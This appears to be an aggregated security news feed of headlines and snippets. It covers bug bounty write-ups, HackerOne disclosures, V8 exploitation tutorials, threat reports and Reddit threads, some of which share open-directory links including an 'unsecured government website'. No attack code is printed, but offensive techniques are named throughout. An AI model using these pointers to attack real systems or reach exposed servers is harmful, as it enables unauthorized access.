    What is Social Engineering
    Art of Psychological manipulation  ( 2 min )
    Content Discovery TryHackme
    Hi, amazing fellow hackers, I produced an interesting topic web content discovery. It is useful in bug bounty and the most important thing…  ( 3 min )
    Day 21, Web Reconnaissance Or Information Gathering — Part 6#100DaysofHacking
    Get all the writeups from Day 1 to 20, Click Here Or Click Here.  ( 3 min )
  • Open

    从 0 开始学 V8 漏洞利用之 CVE-2020-6507(四)
    作者:Hcamael@知道创宇404实验室 相关阅读: 从 0 开始学 V8 漏洞利用之环境搭建(一) 从 0 开始学 V8 漏洞利用之 V8 通用利用链(二) 从 0 开始学 V8 漏洞利用之 starctf 2019 OOB(三) 复现CVE-2020-6507 信息收集 在复习漏洞前,我们首先需要有一个信息收集的阶段: 可以从Chrome的官方更新公告得知某个版本的Chrome存在哪...
  • Open

    从 0 开始学 V8 漏洞利用之 CVE-2020-6507(四)
    作者:Hcamael@知道创宇404实验室 相关阅读: 从 0 开始学 V8 漏洞利用之环境搭建(一) 从 0 开始学 V8 漏洞利用之 V8 通用利用链(二) 从 0 开始学 V8 漏洞利用之 starctf 2019 OOB(三) 复现CVE-2020-6507 信息收集 在复习漏洞前,我们首先需要有一个信息收集的阶段: 可以从Chrome的官方更新公告得知某个版本的Chrome存在哪...

  • Open

    Reload4j 1.2.18.5: A drop-in replacement for Log4j 1.2.17 and CVE fixes
    Article URL: https://reload4j.qos.ch/news.html Comments URL: https://news.ycombinator.com/item?id=30200504 Points: 2 # Comments: 0  ( 1 min )
    Fuzzing Java to Find Log4j Vulnerability – CVE-2021-45046
    Article URL: https://www.youtube.com/watch?v=kvREvOvSWt4 Comments URL: https://news.ycombinator.com/item?id=30190779 Points: 1 # Comments: 0
  • Open

    What is considered more secure VPN client software on IoT device or IoT device behind VPN?
    submitted by /u/baghdadcafe [link] [comments]  ( 1 min )
    Passive log analysis software
    Hello, I am interested if there is tool/software that will help me analyze logs from web server, ssh and Mysql for intrusion, but on another PC. So I basically want to pull logs from many servers and run them trough some software that can detect possible SQLi or path traversal attempts, something like that. I know there is Snort and SIEMs but is there any software that will use for example Snorts engine and rules to do this analysis offline ? Or can I run snort on some log file from other server? P.S. possibly open source. Thanks. submitted by /u/P-e-t-a-r [link] [comments]  ( 5 min )
    OneNote Visibility
    Hi Guys. I like OneNote, and my org blocks anything else, I use it at work and at home. Three questions: If I login to my work OneNote account, on my personal Mac/Win/Linux computers, can my work track my computers at all, or see it's MAC address or name? If I login to my personal OneNote account on my work computer, can they read my OneNotes? Do the answers to the above two questions apply for all of OneDrive too? Appreciate any responses as I've been told that it's all pretty private so I should be good to go with either. submitted by /u/bloqs [link] [comments]  ( 3 min )
  • Open

    Chrome 99: CSS Cascade Layers, a New Picker for Input Elements, and More
    Unless otherwise noted, changes described below apply to the newest Chrome beta channel release for Android, Chrome OS, Linux, macOS, and Windows. Learn more about the features listed here through the provided links or from the list on ChromeStatus.com. Chrome 99 is beta as of February 3, 2022. You can download the latest on Google.com for desktop or on Google Play Store on Android. Preparing for Chrome 100 This year, Chrome will release version 100, adding a digit to the version number reported in Chrome's user agent string. To help site owners test for the new string, Chrome 96 introduced a runtime flag that causes Chrome to return '100' in its user agent string. This new flag called chrome://flags/#force-major-version-to-100 has been available since Chrome 96. For more information, se…
  • Open

    Index of NASA's Land Processes Distributed Active Archive Center
    https://e4ftl01.cr.usgs.gov/ASTT/ ​ Some sort of unsecured government website. submitted by /u/Main_Force_Patrol [link] [comments]
    Indexes from Bronless.Grotto.Faith
    https://bornless.grotto.faith/pages/ https://bornless.grotto.faith/images/ submitted by /u/EmuAnon34 [link] [comments]
    Mozart Opera Omnia in FLAC format (200 CDs)
    http://rmeyer.comelitdns.com/Music/MOZART%20225/ submitted by /u/Appropriate-You-6065 [link] [comments]  ( 1 min )
    Doom 2 WADS
    submitted by /u/millhouse187 [link] [comments]  ( 1 min )
    Lots of movies and TV. Slow connection.
    submitted by /u/josephalbright1 [link] [comments]
    I need a search engine for stat.ameba.jp
    Several blogs from some J-Pop groups were deleted but the photos remain on ameba's servers. I have found a few (https://stat.ameba.jp/user_images/82/56/10138975701.jpg) but would like to search images I have in low quality on this site. submitted by /u/Alarod [link] [comments]
  • Open

    Russia’s Gamaredon aka Primitive Bear APT Group Actively Targeting Ukraine (Updated Feb. 16)
    We continue to monitor Gamaredon. We mapped three large clusters of their infrastructure, identified potential malware testing activity and more. The post Russia’s Gamaredon aka Primitive Bear APT Group Actively Targeting Ukraine (Updated Feb. 16) appeared first on Unit42.
  • Open

    Beethoven X Joins Balancer Labs’ Bug Bounty Program
    In April 2021, Balancer Labs decided to go big in pursuit of uncovering vulnerabilities in their V2 Vault architecture with the launch of… Continue reading on Balancer Protocol »  ( 2 min )
    [Bugbounty]SSRF — IFRAME INJECTION E XSS REFLECTED
    Hoje vou falar um pouco de uma falha que me levou a dois relatórios infelizmente ambos foram duplicados porém ficou de experiência e… Continue reading on Medium »  ( 2 min )
    Subdomain Takeover Bugs — When They’re Applicable And When They’re Not
    At Immunefi, we receive a large number of reports from whitehats regarding subdomain takeovers. But we have a policy of always marking… Continue reading on Immunefi »  ( 3 min )
    UnderRated Tool For Pass-The-Hash[Evil-WinRM]
    First Of all I’ll Describe What is Pass-The-Hash Attack Continue reading on Medium »  ( 1 min )
  • Open

    A detailed analysis of Lazarus malware disguised as Notepad++ Shell Extension
    submitted by /u/CyberMasterV [link] [comments]
    NTLM Relaying - A comprehensive guide
    submitted by /u/jeanc0re [link] [comments]  ( 1 min )
    [CVE-2022-23602] Don't trust comments
    submitted by /u/crower [link] [comments]  ( 1 min )
    History of REvil: detailed report on the rise and fall of a Russian crime gang.
    submitted by /u/Jazzlike-Resource500 [link] [comments]
  • Open

    Interview questions for entry level incident response positions?
    i have an interview coming up soon. What sort of technical questions /scenario questions should I be expecting? Thx submitted by /u/tfulab23 [link] [comments]  ( 2 min )
    Photorec Issues
    I am new to computer forensics and am having trouble installing autopsy to my Mac. When I am installing autopsy, I get an error when checking the prerequisites for autopsy. Specifically, when I type "sh unix_setup.sh" into terminal, it reads "ERROR: PhotoRec not found, please install the testdisk package." I have installed testdisk so I am just confused why I get this error. Sorry if this is a stupid question, I am just dumbfounded by this error message. submitted by /u/Vekayy [link] [comments]  ( 1 min )
  • Open

    Remote Code Execution on .8x8.com via .NET VSTATE Deserialization
    8x8 disclosed a bug submitted by 0daystolive: https://hackerone.com/reports/1391576
    text injection and content spoofing
    OneWeb disclosed a bug submitted by aman420: https://hackerone.com/reports/1353200
    Reflected Xss in https://world.engelvoelkers.com/...
    Engel & Völkers Technology GmbH disclosed a bug submitted by pl4gue_shell: https://hackerone.com/reports/1401209
    Ruby CVE-2021-41819: Cookie Prefix Spoofing in CGI::Cookie.parse
    Internet Bug Bounty disclosed a bug submitted by ooooooo_q: https://hackerone.com/reports/1464396 - Bounty: $2000
  • Open

    SecWiki News 2022-02-03 Review
    新姿势绕过应用的ROOT检测 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    SecWiki News 2022-02-03 Review
    新姿势绕过应用的ROOT检测 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    Tuning in the Hot Spots
    A few months ago, I posted an instructional video on using internet radio servers to tune and listen to AM radio stations in Ukraine and… Continue reading on Medium »  ( 1 min )
    Quiztime — Random OSINT Challenge 10
    On Jan 20, 2022, Quiztime (contributor @trbrtc) shared a new OSINT quiz with us. The objective was, interesting. We had to figure out… Continue reading on Medium »  ( 2 min )
    Open-source Intelligence. With OSINT Course Giveaway !!
    Open-source Intelligence: Premimum Hacking Course In Free !! Continue reading on Medium »  ( 2 min )
  • Open

    I’m bringing relaying back: A comprehensive guide on relaying anno 2022
    For years now, Internal Penetration Testing teams have been successful in obtaining a foothold or even compromising entire domains through a technique called NTLM relaying. The earliest, most descriptive relaying blog post I could find dates all the way back to 2017 written by Marcello, better known as byt3bl33d3r:https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html At the time of writing this... The post I’m bringing relaying back: A comprehensive guide on relaying anno 2022 appeared first on TrustedSec.  ( 15 min )
  • Open

    SnapFuzz: New fuzzing tool speeds up testing of network applications
    Article URL: https://portswigger.net/daily-swig/snapfuzz-new-fuzzing-tool-speeds-up-testing-of-network-applications Comments URL: https://news.ycombinator.com/item?id=30191854 Points: 17 # Comments: 2  ( 4 min )
    Fuzzing Java to Find Log4j Vulnerability – CVE-2021-45046
    Article URL: https://www.youtube.com/watch?v=kvREvOvSWt4 Comments URL: https://news.ycombinator.com/item?id=30190779 Points: 1 # Comments: 0
  • Open

    Fuzzing Java to Find Log4j Vulnerability – CVE-2021-45046
    Article URL: https://www.youtube.com/watch?v=kvREvOvSWt4 Comments URL: https://news.ycombinator.com/item?id=30190779 Points: 1 # Comments: 0
  • Open

    Exposing FBI's Most Wanted Cybercriminal Mujtaba Raza from Forwarderz and SecondEye Solution - An OSINT Analysis - Maltego Technical Details Video Demonstration
    Google is your best friend! Here's the original analysis. Check out the actual Maltego technical details video demonstration here: Enjoy!
  • Open

    What is Red Teaming?
    This blog post was published on PurpleBox website on Feb 2nd, 2022. Continue reading on PurpleBox »  ( 6 min )
  • Open

    从 0 开始学 V8 漏洞利用之 starctf 2019 OOB(三)
    作者:Hcamael@知道创宇404实验室 相关阅读: 从 0 开始学 V8 漏洞利用之环境搭建(一) 从 0 开始学 V8 漏洞利用之 V8 通用利用链(二) 我是从starctf 2019的一道叫OOB的题目开始入门的,首先来讲讲这道题。 FreeBuf上有一篇《从一道CTF题零基础学V8漏洞利用》,我觉得对初学者挺友好的,我就是根据这篇文章开始入门v8的漏洞利用。 环境搭建 $ git...
  • Open

    从 0 开始学 V8 漏洞利用之 starctf 2019 OOB(三)
    作者:Hcamael@知道创宇404实验室 相关阅读: 从 0 开始学 V8 漏洞利用之环境搭建(一) 从 0 开始学 V8 漏洞利用之 V8 通用利用链(二) 我是从starctf 2019的一道叫OOB的题目开始入门的,首先来讲讲这道题。 FreeBuf上有一篇《从一道CTF题零基础学V8漏洞利用》,我觉得对初学者挺友好的,我就是根据这篇文章开始入门v8的漏洞利用。 环境搭建 $ git...

  • Open

    Debian has not fixed CVE-2021-44142
    Article URL: https://security-tracker.debian.org/tracker/CVE-2021-44142 Comments URL: https://news.ycombinator.com/item?id=30183811 Points: 2 # Comments: 1
  • Open

    WooCommerce Skimmer Uses Fake Fonts and Favicon to Steal CC Details
    The holidays are always a busy time for ecommerce stores. Dealing with an influx of Christmas shoppers, holiday sales and inventory, shipping, and at times, also hackers. Today’s investigation starts out much like many others, with our client reporting an antivirus warning appearing only on their checkout page, of course at the worst possible time right around the end of December. What first seemed to be a routine case of credit card theft turned out to be a much more interesting infection that leveraged both font, favicon and other less-commonly used files to pilfer credit card details. Continue reading WooCommerce Skimmer Uses Fake Fonts and Favicon to Steal CC Details at Sucuri Blog.
  • Open

    Entry-level Penetration Tester salary in Switzerland?
    What would be an approximate salary range for a penetration tester in Switzerland (Zürich area as a reference)? Not necessary big 4 but also small or medium size companies, for an entry level position, with a master's degree, and a 6-month internship in the field as the only experience. submitted by /u/BroX111 [link] [comments]  ( 1 min )
    How would you fix today's computer security problems?
    UPDATE: My original question was too broad. Please choose which significant problem you might solve based on your expertise. No silver bullet to solve all security problems is necessary. Thanks for your constructive criticism! How would you fix today's computer security problems if you could start any hardware or software company, or create any technology related standard. It could be anything, maybe new hardware and software working together that fixes a major problem like hacking or malware. I don't want to put anyone in a creative box so I'll share my idea later today. Please don't read any results until you have thought of something. Update: How would you protect as many people as possible when you run control a company like Google, Microsoft, Intel, etc., or can pass new laws or create new tech standards. submitted by /u/greyyit [link] [comments]  ( 5 min )
    EDR / XDR on premise
    Hi Anyone knows of useful edr products which could be operated on premise, without using cloud services? Could also just be a so called next gen av at least? Maybe you could even share some experience? All products I know are cloud based and report too much to the cloud (e.g. file paths, user information etc). I've read of Cyberason once, but the link to the on PREM offer is invalid... Bitdefender advertises an edr on prem, but I only know them from a consumer perspective. Thanks! submitted by /u/winschdi [link] [comments]  ( 2 min )
    Scanning for locations.
    Hello, Any tips on scanning slower with gobuster or other tool for finding paths and evade WAF. I'm afraid it will be detected and probably my machine will be blocked by it. submitted by /u/tryingtoworkatm [link] [comments]  ( 1 min )
    How Are Hackers Caught
    If tools like proxies are available to hackers, how are they caught? submitted by /u/Odd_Rip6706 [link] [comments]  ( 4 min )
    Advice deciding between 2 cybersecurity offers at the Big4
    Hey guys, I recently received cybersecurity consultant offers from both KPMG and EY. While I do have a lot of info about each firm based on my interviews and offer letters, I was wondering if there were any former/current employees or anybody here who has worked with these two firms, and if they could share about their experiences? Compensation-wise, EY's is higher. They're both in the same city on the West Coast. Thanks! submitted by /u/bongotw [link] [comments]  ( 2 min )
    Question regarding CTI even that can lead to an incident
    Hi user, I have a question regarding threat intelligence and "incident" response. Let's take an example: I work for Company A. I notice that an access broker sell access to Company B. Company A and Company B work together and have some network connexion to exchange data. In this case, we can suppose that company B will increase our threat risk due to possible lateral movement, but as the threat actor "only" sell an access, we can't determine what kind of threat we will facing. On the business side this will be hard for them to understand that it's a potential threat and we should execute a containment phase by cutting connexion with company B. And for the detection team, we don't have enough info on what kind of threat they should monitor. In your opinion, what should i do ? submitted by /u/octave_ [link] [comments]  ( 2 min )
  • Open

    Using Power Automate for Covert Data Exfiltration in Microsoft 365
    submitted by /u/rsobers [link] [comments]
    Hacking Google Drive Integrations
    submitted by /u/albinowax [link] [comments]
  • Open

    The evolution of a Mac trojan: UpdateAgent’s progression
    submitted by /u/SCI_Rusher [link] [comments]
  • Open

    Walkthrough — Hacktoria: Geolocation 06
    As I’m having so much fun doing the Hacktoria’s geolocation challenges, I have decided to just keep solving them and writing walkthroughs… Continue reading on Medium »  ( 3 min )
    Quiztime — Random OSINT Challenge 8
    On Jan 16, 2022, Quiztime (contributor @trbrtc) shared a new OSINT quiz with us. The objective was simple but cool. We had to figure out… Continue reading on Medium »  ( 3 min )
  • Open

    Vulnerability Capstone — Tryhackme
    Vulnerability Researching  ( 2 min )
    CTF Write-Up: Rain
    CTF Write-Up: Rain  ( 3 min )
    Multiple HTTP Redirects to Bypass SSRF Protections
    Always try more than one HTTP 302 redirects when testing for SSRF  ( 4 min )
    How I Made +$16,500 Hacking CDN Caching Servers — Part 3
    @bxmbn  ( 2 min )
    How I Made +$16,500 Hacking CDN Caching Servers — Part 2
    @bxmbn  ( 2 min )
    How I Made $16,500+ By Hacking Caching Servers — Part 1
    @bxmbn  ( 2 min )
    Data exfiltration using XXE on a hardened server
    Blind XXE exploitaion using error based method.  ( 4 min )
    Day 20, Web Reconnaissance Or Information Gathering — Part 5#100DaysofHacking
    Get all the writeups from Day 1 to 19, Click Here Or Click Here.  ( 3 min )
    How I Hacked Kerala Road Transport Corporation(KSRTC)?
    Hello Hackers!! My name is Krishnadev P Melevila, a 19-Year-Old Self-learned cybersecurity enthusiast and web application penetration…  ( 2 min )
  • Open

    Vulnerability Capstone — Tryhackme
    Vulnerability Researching  ( 2 min )
    CTF Write-Up: Rain
    CTF Write-Up: Rain  ( 3 min )
    Multiple HTTP Redirects to Bypass SSRF Protections
    Always try more than one HTTP 302 redirects when testing for SSRF  ( 4 min )
    How I Made +$16,500 Hacking CDN Caching Servers — Part 3
    @bxmbn  ( 2 min )
    How I Made +$16,500 Hacking CDN Caching Servers — Part 2
    @bxmbn  ( 2 min )
    How I Made $16,500+ By Hacking Caching Servers — Part 1
    @bxmbn  ( 2 min )
    Data exfiltration using XXE on a hardened server
    Blind XXE exploitaion using error based method.  ( 4 min )
    Day 20, Web Reconnaissance Or Information Gathering — Part 5#100DaysofHacking
    Get all the writeups from Day 1 to 19, Click Here Or Click Here.  ( 3 min )
    How I Hacked Kerala Road Transport Corporation(KSRTC)?
    Hello Hackers!! My name is Krishnadev P Melevila, a 19-Year-Old Self-learned cybersecurity enthusiast and web application penetration…  ( 2 min )
  • Open

    Vulnerability Capstone — Tryhackme
    Vulnerability Researching  ( 2 min )
    CTF Write-Up: Rain
    CTF Write-Up: Rain  ( 3 min )
    Multiple HTTP Redirects to Bypass SSRF Protections
    Always try more than one HTTP 302 redirects when testing for SSRF  ( 4 min )
    How I Made +$16,500 Hacking CDN Caching Servers — Part 3
    @bxmbn  ( 2 min )
    How I Made +$16,500 Hacking CDN Caching Servers — Part 2
    @bxmbn  ( 2 min )
    How I Made $16,500+ By Hacking Caching Servers — Part 1
    @bxmbn  ( 2 min )
    Data exfiltration using XXE on a hardened server
    Blind XXE exploitaion using error based method.  ( 4 min )
    Day 20, Web Reconnaissance Or Information Gathering — Part 5#100DaysofHacking
    Get all the writeups from Day 1 to 19, Click Here Or Click Here.  ( 3 min )
    How I Hacked Kerala Road Transport Corporation(KSRTC)?
    Hello Hackers!! My name is Krishnadev P Melevila, a 19-Year-Old Self-learned cybersecurity enthusiast and web application penetration…  ( 2 min )
  • Open

    Serious Vulnerability in WordPress Plugin Essential Addons for Elementor
    Article URL: https://portswigger.net/daily-swig/serious-vulnerability-in-wordpress-plugin-essential-addons-for-elementor-eliminated Comments URL: https://news.ycombinator.com/item?id=30179610 Points: 2 # Comments: 1  ( 3 min )
    Critical Vulnerability in WordPress Plugin Essential Addons for Elementor
    Article URL: https://portswigger.net/daily-swig/critical-vulnerability-in-wordpress-plugin-essential-addons-for-elementor Comments URL: https://news.ycombinator.com/item?id=30179238 Points: 1 # Comments: 0  ( 3 min )
    Fastly patches memory leak HTTP/3 vulnerability in H2O HTTP server project
    Article URL: https://portswigger.net/daily-swig/fastly-patches-memory-leak-http-3-vulnerability-in-h2o-http-server-project Comments URL: https://news.ycombinator.com/item?id=30177816 Points: 3 # Comments: 0  ( 3 min )
  • Open

    SecWiki News 2022-02-02 Review
    安全学术圈2021年度总结 by ourren 2021 年终总结:记我在清华 Apache IoTDB 组的成长 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    SecWiki News 2022-02-02 Review
    安全学术圈2021年度总结 by ourren 2021 年终总结:记我在清华 Apache IoTDB 组的成长 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    Common authentication and authorization vulnerabilities (and how to avoid them)
    Authentication and authorization are two cornerstones of modern web application security, but there are many ways to get them wrong. Learn how to identify common security defects and avoid vulnerabilities that could allow attackers to access restricted data and functionality by bypassing authentication, authorization, or both. READ MORE  ( 6 min )
  • Open

    Notional Double Counting Free Collateral Bugfix Review
    Summary Continue reading on Immunefi »  ( 5 min )
    My first bounty, IDOR + Self XSS [€3000]
    Every hacker would have come across this, the first bounty. I can’t actually explain how it feels but I know that most of you can… Continue reading on Medium »  ( 5 min )
    How To Spice Up Your Programming Journey With 5 Hacks.
    If you are a beginning programmer like me as much as you love programming, there will be times when you feel down. This is not you been… Continue reading on Medium »  ( 2 min )
  • Open

    Утилитарные компоненты и входное значение sx Material-UI
    Утилитарный компонент Box визуализируется как элемент div и предоставляет возможность применять синтаксис краткой формы записи стилей CSS… Continue reading on Medium »  ( 1 min )
    My first bounty, IDOR + Self XSS [€3000]
    Every hacker would have come across this, the first bounty. I can’t actually explain how it feels but I know that most of you can… Continue reading on Medium »  ( 5 min )
  • Open

    Index pages from 973-eht-namuh-973
    https://www.973-eht-namuh-973.com/search-pages/ https://www.973-eht-namuh-973.com/coloured%20site/ https://www.973-eht-namuh-973.com/Black%20and%20White/ https://www.973-eht-namuh-973.com/images/ https://www.973-eht-namuh-973.com/rotators/ https://www.973-eht-namuh-973.com/Alchemy/ https://www.973-eht-namuh-973.com/Magick/ Let me know if there’s others I missed. submitted by /u/EmuAnon34 [link] [comments]  ( 1 min )
    Animated movies (sorry if repost)
    submitted by /u/lostsquanderer [link] [comments]
    Large folder of videos pertaining to game design
    http://mirror.reenigne.net/gdc/ submitted by /u/inoculatemedia [link] [comments]
    Old gramophone records
    http://oldgramophonerecords.co.uk/4y1/ submitted by /u/inoculatemedia [link] [comments]  ( 1 min )
  • Open

    Multiple vulnerability leading to account takeover in TikTok SMB subdomain.
    TikTok disclosed a bug submitted by lu3ky-13: https://hackerone.com/reports/1404612 - Bounty: $999
  • Open

    Recycle bin conundrum
    Have a read only external USB device with a copy of an imaged recycle bin. Goal is to pass off SUB to attorney for review of recycle bin $R files. WIN10 forensic laptop (A) recycle bin is empty, no software running. When plugged into forensic laptop, I can navigate via File Explorer to the recycle bin folders and files. I can open the $R files and SID of user for 2 user accounts. I properly eject SUB and connect to another laptop (B) before passing off to attorney. Laptop (B) is my day to day use laptop. The recycle bin on laptop (B) is empty. Laptop (B) is a WIN10 machine. When I plug SUB into laptop (B) and navigate to recycle bin files, no SIDs, instead recycle bin icons. When I click on the recycle bin icons, no contents. Any ideas on how to resolve this ? submitted by /u/ATXChimera [link] [comments]  ( 1 min )
  • Open

    从 0 开始学 V8 漏洞利用之 V8 通用利用链(二)
    作者:Hcamael@知道创宇404实验室 相关阅读:从 0 开始学 V8 漏洞利用之环境搭建(一) 经过一段时间的研究,先进行一波总结,不过因为刚开始研究没多久,也许有一些局限性,以后如果发现了,再进行修正。 概述 我认为,在搞漏洞利用前都得明确目标。比如打CTF做二进制的题目,大部分情况下,目标都是执行system(/bin/sh)或者execve(/bin/sh,0,0)。 在v8利用...
  • Open

    从 0 开始学 V8 漏洞利用之 V8 通用利用链(二)
    作者:Hcamael@知道创宇404实验室 相关阅读:从 0 开始学 V8 漏洞利用之环境搭建(一) 经过一段时间的研究,先进行一波总结,不过因为刚开始研究没多久,也许有一些局限性,以后如果发现了,再进行修正。 概述 我认为,在搞漏洞利用前都得明确目标。比如打CTF做二进制的题目,大部分情况下,目标都是执行system(/bin/sh)或者execve(/bin/sh,0,0)。 在v8利用...

  • Open

    Newbie investigating hdd
    Hello there, recently acquired some used HDD to try forensics as a student in cyber security. I'm using Kali Linux in forensic mode. Have a few questions : 1) Can using fdisk -l or parted -l modify data on the hdd ? (both launched as root) What about gparted ? (if not touching anything oc) 2) Working as root, is chmod a-w /dev/sde (the drive "location") really useful, like will it really prevent any write even from root ? 3) Created an image with dcfldd, asked for sha1 checksum, and before imaging used sha1sum on /dev/sde. They match. Do anyone work another way ? 4) Tried to import the image on autopsy with different settings but no file or anything else found. Then successfully linked to /dev/loop1 using losetup, but could not mount the "partition" (no filesystem nor partition is detected with parted -l, but gparted tells sde is an ataraid partition). Had some error like "unknown filesystem type 'ddf_raid_member'", so after a bit of digging tried some stuff with mdamd, but did not work. Any idea ? submitted by /u/ner00n [link] [comments]  ( 2 min )
    Creating Encase Image of Macbook Pro Max (A2485)
    Hi everyone, ​ I want to create an encase-image from a MacBook (Model A2485, M1 Max) but any of my attempt so far just have failed. Password is known and I have physical access to the device. Following things I allready tried: - boot external usb with Paladin Edge -> failed to boot from it (tried to allow Booting from external sources via recovery, but there was no option for enabling) - put the MacBook into targetdisk mode an connected it to another iMac -> tried to create an image via ewfaquire but the shared disk wasn't an extra device (or I failed to see it) - boot external usb with Paladin Edge on another iMac, put the MacBook into targetdisk mode an connected it to the iMac -> Paladin Edge doesn't recognize the shared disc My last idea is just to do a timemachine backup from the macbook to a clean / wiped hdd and create an encase image from it ... Does someone have any other ideas? Would be very happy about any suggestions! Thanks in advance! submitted by /u/frcGuy81 [link] [comments]  ( 2 min )
  • Open

    Inside Trickbot, Russia’s Notorious Ransomware Gang
    submitted by /u/CyberMasterV [link] [comments]
    New Hybrid Campaign OiVaVoii Uses Malicious OAuth Apps | Cyware Hacker News
    submitted by /u/ITlocknkey [link] [comments]
    Using PwnKit-Hunter to check for CVE-2021-4034 Vulnerable Systems
    submitted by /u/jat0369 [link] [comments]
    Remote root vulnerability for Samba (CVE 2021-44142)
    submitted by /u/lormayna [link] [comments]  ( 1 min )
  • Open

    Twitter stores original account names, dox vulnerability via Twitter Spaces
    Article URL: https://twitter.com/tszzl/status/1488466979799265281 Comments URL: https://news.ycombinator.com/item?id=30169435 Points: 31 # Comments: 1  ( 1 min )
    Arbitrary code execution vulnerability in Samba
    Article URL: https://www.samba.org/samba/security/CVE-2021-44142.html Comments URL: https://news.ycombinator.com/item?id=30166148 Points: 3 # Comments: 0  ( 1 min )
    High severity vulnerability in Element Desktop 1.9.6 and earlier
    Article URL: https://matrix.org/blog/2022/01/31/high-severity-vulnerability-in-element-desktop-1-9-6-and-earlier/ Comments URL: https://news.ycombinator.com/item?id=30163784 Points: 1 # Comments: 0  ( 1 min )
  • Open

    SQL injection at /admin.php?/cp/members/create
    ExpressionEngine disclosed a bug submitted by khoabda1: https://hackerone.com/reports/968240
    Information disclosure-Referer leak
    Brave Software disclosed a bug submitted by kkarfalcon: https://hackerone.com/reports/1337624 - Bounty: $500
    The Return of the Grinch
    h1-ctf disclosed a bug submitted by w31rd0: https://hackerone.com/reports/1433581 - Bounty: $1000
    Saving Christmas from Grinchy Gods
    h1-ctf disclosed a bug submitted by akshansh: https://hackerone.com/reports/1434017 - Bounty: $1000
    Full Response SSRF via Google Drive
    Dropbox disclosed a bug submitted by bugdiscloseguys: https://hackerone.com/reports/1406938 - Bounty: $17576
    Reflected Xss On https://vk.com/search
    VK.com disclosed a bug submitted by b4walid: https://hackerone.com/reports/1454359 - Bounty: $500
  • Open

    [Question] How are these directories discovered? Is it random web-surfing then sharing? Or do some of you use crawlers?
    Basically says it all in the title! I just found this sub-reddit, VERY COOL! I am a /r/datahoarder and I appreciate this sort of thing! I am just curious to how these open directories are discovered. Thanks all for being apart of this community! submitted by /u/cs_legend_93 [link] [comments]  ( 1 min )
    Does anyone have OD-Shots uploaded in 2019 and 2020?
    I'm looking for .xlsx files that were posted in 2019/2020 on this sub, because the links that were uploaded are now dead. Does anyone saved them and can upload them once again? Again, i'm not looking for last upload but files that were shared earlier. submitted by /u/GingrFattyJesusFreak [link] [comments]  ( 1 min )
    Filechef not working???
    Does anyone know if https://www.filechef.com/ is down??? submitted by /u/klutz50 [link] [comments]
    photos and documents relating to Russian involvement in Ukraine
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
    high res images of Russian dairy products
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]  ( 1 min )
  • Open

    No Rate Limiting on OTP sending
    Firstly I would like to say that this is my first ever writeup for the InfoSec community and I may not be so good at presenting the… Continue reading on Medium »  ( 2 min )
    Theoretical Bugs With No Impact Don’t Get Paid — Here’s Why
    As a whitehat, it’s easy to want to submit as many bugs as possible to a project — especially projects on Immunefi, because the bounties… Continue reading on Immunefi »  ( 2 min )
    H1-CTF Hacky Holidays Writeup
    Hey everyone i hope you all are fine and doing good, In December Hackerone made a 12 day 12 level CTF called Hacky-Holidays which had 12… Continue reading on Medium »  ( 8 min )
    My experience of Hacking The Dutch Government
    Hi Everyone! , Continue reading on Medium »  ( 2 min )
    OSINT Tips for Penetration Testing
    In this article, we will discuss some of my favorite OSINT techniques that can help during your penetration testing activities. Continue reading on Medium »  ( 1 min )
    Check Out the Speakers for IWCON 2022
    Register today to be a part of the coolest Cybersecurity conference of 2022! Continue reading on InfoSec Write-ups »  ( 2 min )
    Password Spraying Attack
    Hello everyone! 🎉 Continue reading on Medium »  ( 1 min )
    A Peculiar Case of XSS and my first bug
    Hello everyone, I am new to security stuff and will share how I was able to get few XSS in not so common way. Continue reading on Medium »  ( 1 min )
    IDOR vulnerability on invoice and weak password reset leads to account take over
    This year I started doing bug bounties and I only got valid p5 report and my report for p4 and p3 got rejected. Continue reading on Medium »  ( 3 min )
    Understanding Automation in Bug Bounty
    ==UNDER CONSTRUCTI Continue reading on Medium »  ( 1 min )
    Beginner Bug Bounty Guide - Part 5
    Continue reading on Medium »
  • Open

    Question on using VMware pro and Nessus, isolating one VM from communication with internet.
    I need help running vuln scan using vm workstation pro and Nessus :/ Looking for advice/help on vuln. scanning using VMware workstation pro and Nessus Hey folks!!! I am looking to run Nessus on one VM, and run the vulnerability scan on a second VM. My constraints are that the VM running Nessus should be able to access/communicate out to the internet, while the VM being scanned should not be able to communicate to the internet — it should only be able to communicate with the VM performing the Nessus scan. I tried setting up both VMs on a host only VMnet, but Nessus was not able to get or use certain plugins that way. I’m looking for any help or advice setting this up how I described as I have not been successful. Thanks in advance for any help! submitted by /u/enki0817 [link] [comments]  ( 1 min )
    IRM/document encryption... Why isn't it used more?
    I'm a MS:CS student taking some cybersecurity classes. We learned about IRM, basically symmetrically encrypted documents with the keys managed by a central server backed via AD or whatever the org uses for AAA. It sounds pretty useful for dealing with vendors and helping deter exfiltration (and as a bonus, leaked docs encrypted at rest can't easily be used to extort ransoms), but it doesn't sound like very many places use it. Are the downsides of cost, difficulty of use for the the user, and vendor lock-in a deal breaker for a lot of enterprises? Is the prevailing view that since someone can still take pictures of the screen with their phone, it's not worth the effort? Or that this kind of threat isn't considered to be very serious? What other real world issues am I not considering? Cheers submitted by /u/berrmal64 [link] [comments]  ( 4 min )
    Help me guys
    I have downloaded 2 photo recovery apps from playatore into my phone. But I am scared that they might be fake apps which steals photos. I have checked the privacy policy in which it was statated that The information that I request will be retained on your device and is not collected by me in any way. But now im not sure whethet i can trust them. The apps seem to be fake with manipulated reviews. Where would all my photos go to if they are sus apps? Do you guys think that they are sus apps by high chances? It would be nice if I get replies... Thank you! submitted by /u/WhiteSwordMaster [link] [comments]  ( 1 min )
    Has my NVR been hacked?
    Was just looking at my IDS alerts on my pfSense router and noticed the following entries seen in the screenshot here https://imgur.com/a/AMfpMaH. I've done a whois on some of the source IP addresses and they're questionable, to say the least. The device in question is a Hikvision NVR. My main concern is, has my NVR been hacked and turned into a TOR relay/exit node? Is there anything I can do to test this? I also want to point out that I don't have any ports opened facing the internet for this NVR which is also a bit weird as I thought that would offer me more protection! TIA submitted by /u/Bosshogg226 [link] [comments]  ( 1 min )
  • Open

    SecWiki News 2022-02-01 Review
